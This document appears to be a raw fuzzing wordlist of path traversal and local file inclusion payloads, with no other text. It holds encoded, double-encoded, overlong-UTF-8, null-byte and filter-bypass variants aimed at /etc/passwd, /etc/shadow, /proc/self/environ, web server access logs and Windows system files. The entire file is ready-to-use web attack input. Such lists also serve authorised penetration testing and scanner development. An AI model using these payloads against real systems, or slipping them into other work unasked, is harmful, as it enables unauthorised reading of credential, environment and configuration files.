../../../../etc/passwd
../../../../../../../../etc/passwd
..%2f..%2f..%2f..%2fetc%2fpasswd
..%252f..%252f..%252f..%252fetc%252fpasswd
....//....//....//etc/passwd
....\/....\/....\/etc/passwd
..;/..;/..;/etc/passwd
/etc/passwd
/etc/hosts
/proc/self/environ
/var/log/apache2/access.log
/var/log/nginx/access.log
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
..%c0%af..%c0%afetc%c0%afpasswd
..%ef%bc%8f..%ef%bc%8fetc%ef%bc%8fpasswd
..%c1%1c..%c1%1cetc%c1%1cpasswd
..%e0%80%af..%e0%80%afetc%e0%80%afpasswd
../../../../etc/passwd%00
../../../../etc/passwd%2500
non_existing_dir/../../../etc/passwd/././././././././././././././././
non_existing/../../../../../../etc/passwd/............................................................
./languages/../../../../etc/passwd
languages/../../../etc/passwd
./app/lang/../../../../etc/passwd
lang/../lang/../lang/../etc/passwd
../../../../../../proc/self/cmdline
../../../../../../proc/self/status
../../../../../../proc/version
../../../../../../proc/mounts
../../../../../../proc/self/fd/0
../../../../../../proc/self/environ
../../../../../../etc/shadow
../../../../../../windows/win.ini
../../../../../../windows/system32/drivers/etc/hosts
../../../../../../boot.ini
..%2f..%2fetc%2fpasswd
..%2e%2e%2f..%2e%2e%2fetc%2fpasswd
..%2e%2e%5c..%2e%2e%5cetc%5cpasswd
....//....//....//etc/passwd
..././..././..././etc/passwd
..///////..///////etc/passwd
/lib///....//....//....//....//....//....//....//....//etc//passwd
